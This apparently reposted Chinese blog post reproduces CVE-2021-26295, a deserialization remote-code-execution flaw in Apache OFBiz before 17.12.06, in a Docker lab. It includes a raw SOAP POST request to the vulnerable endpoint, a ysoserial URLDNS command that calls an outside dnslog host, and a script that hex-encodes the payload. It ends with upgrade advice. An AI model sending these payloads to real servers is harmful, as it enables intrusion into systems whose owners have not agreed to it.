Apache ofbiz RMI遠程代碼執行漏洞復現(CVE-2021-26295)
介紹:
OFBiz是一個非常著名的電子商務平臺,是一個非常著名的開源專案,提供了創建基于最新J2EE/XML規范和技術標準,構建大中型企業級、跨平臺、跨資料庫、跨應用服務器的多層、分布式電子商務類WEB應用系統的框架,
OFBiz最主要的特點是OFBiz提供了一整套的開發基于Java的web應用程式的組件和工具,包括物體引擎, 服務引擎, 訊息引擎,
作業流引擎, 規則引擎等,OFBiz 已經正式成為 Apache 的頂級專案: Apache OFBiz
影響版本:
apache:ofbiz: <17.12.06
環境部署:
使用docker環境部署,拉取鏡像
啟動容器
sudo docker run -d -p 8888:8080 -p 8443:8443 opensourceknight/ofbiz
如果物理機無法訪問docker內服務的問題
# 停止docker服務
systemctl stop docker
# 重建 docker 網路
ifconfig docker0 down
brctl delbr docker0
# 重啟docker服務
systemctl start docker
漏洞地址:
url+/webtools/control/SOAPService
POC:
地址
手工測驗:
POST /webtools/control/SOAPService HTTP/1.1
Host: xxxxxx
Content-Length: 1007
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/xml
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-HashMap>
<map-Entry>
<map-Key>
<cus-obj>{編譯的代碼}</cus-obj>
</map-Key>
<map-Value>
<std-String value="http://xxxx.dnslog.cn"/>
</map-Value>
</map-Entry>
</map-HashMap>
</ser>
</soapenv:Body>
</soapenv:Envelope>
利用ysoserial生成URLDNS利用鏈:
java -jar ysoserial.jar URLDNS http://***.dnslog.cn > 1.ot
利用python腳本將ot檔案解碼:
import binascii
filename = '1.ot'
with open(filename, 'rb') as f:
content = f.read()
print(binascii.hexlify(content))
提交后,DNSlog收到請求:
漏洞修復:
升級到最新版本或安全版本
https://ofbiz.apache.org/download.html#vulnerabilities
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/385725.html
標籤:其他